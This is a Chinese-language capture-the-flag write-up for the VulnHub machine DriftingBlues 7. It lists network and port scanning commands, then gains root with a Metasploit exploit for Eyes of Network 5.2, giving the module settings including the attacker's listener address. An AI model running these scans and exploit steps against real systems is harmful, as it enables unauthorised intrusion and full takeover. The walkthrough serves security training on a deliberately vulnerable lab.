靶机地址: https://www.vulnhub.com/entry/driftingblues-7,680/
1、主机探活
arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)
masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号)
netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段)
nmap -sn 192.168.111.0/24
2、端口扫描
nmap -sS -A -sV -T4 -p- 192.168.111.21
22—ssh—OpenSSH 7.4 (protocol 2.0)
66—http—SimpleHTTPServer 0.6 (Python 2.7.5)
80—http—Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips
111—rpcbind—2-4 (RPC #100000)
443—ssl/http—Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips
2403—taskmaster2000?
3306—mysql—MariaDB (unauthorized)
8086—http—InfluxDB http admin 1.7.9
3、老样子,还是先从80端口入手
映入演练的就是一个大大的eyes of network
4、百度搜了一下发现是一个开源的监控方案
既然如此直接在msf里看看有没有exp
ok,有一个可以直接用的exp,我们直接尝试利用看看呗(其实应该是先知道网站上的版本)
在源代码中,有很多css,逐一点开可以在其中一个发现network的版本为5.2,在我们exp适用的版本内
https://192.168.111.21/css/eonweb.css
5、msf漏洞利用
搜索漏洞:search eyes of network
使用模块: use 0
设置 kali: set lhost 192.168.111.7
设置攻击目录: set rhosts 192.168.111.21
运行模块: run
利用成功,getuid发现直接是root权限了。。好家伙
完结散花~
总结:
1、信息收集很重要,包括目录扫描,源代码探查等
2、searchsploit 、msf 工具的使用
参考:鹏组安全师傅的wp